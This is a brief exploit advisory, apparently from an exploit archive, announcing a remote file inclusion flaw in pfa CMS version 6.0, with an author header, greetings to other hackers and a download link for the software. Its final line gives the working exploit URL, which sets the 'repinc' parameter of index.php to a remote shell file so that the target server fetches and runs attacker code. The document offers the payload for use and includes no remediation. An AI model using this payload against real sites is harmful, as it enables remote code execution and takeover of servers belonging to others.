pfa CMS version 6.0 suffers from a remote file inclusion vulnerability.
ed159e160cb061f87178cedbcbc60f39ca6cb6fed13a02d79f64d82657598a9f
# pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! => OZELHAREKAT
# Author: iLker Kandemir <ilkerkandemir@mynet.com>
# ScriptSite: http://pfa.netsliver.com/download_pfa
# Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke
# Exploit: http://[site]/[pfa_path]/index.php?repinc=http://shell.txt?